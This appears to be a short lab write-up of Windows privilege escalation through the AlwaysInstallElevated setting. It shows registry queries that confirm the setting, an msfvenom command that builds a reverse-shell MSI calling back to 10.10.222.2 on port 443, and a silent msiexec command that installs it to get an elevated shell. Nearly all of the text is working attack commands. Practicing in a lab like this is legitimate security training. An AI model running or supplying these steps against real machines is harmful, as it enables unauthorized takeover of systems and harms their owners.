this files are used for installing applications and it will execute with the current user privileges

Untitled

now let’s manually find this by quering the HKLM and HKCU registery

HKLM

reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated

Untitled

now the HKCU

reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated

Untitled

as we see both registers are found

note: for this method both the HKLM and the HKCU registers should be found

now as those are found so let’s create a malicious msi package using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.222.2 LPORT=443 -f msi -o reverse.msi

Untitled

now transfare it to the machine

after transfer run

msiexec /quiet /qn /i C:\\PrivEsc\\reverse.msi

Untitled

now let’s check our listener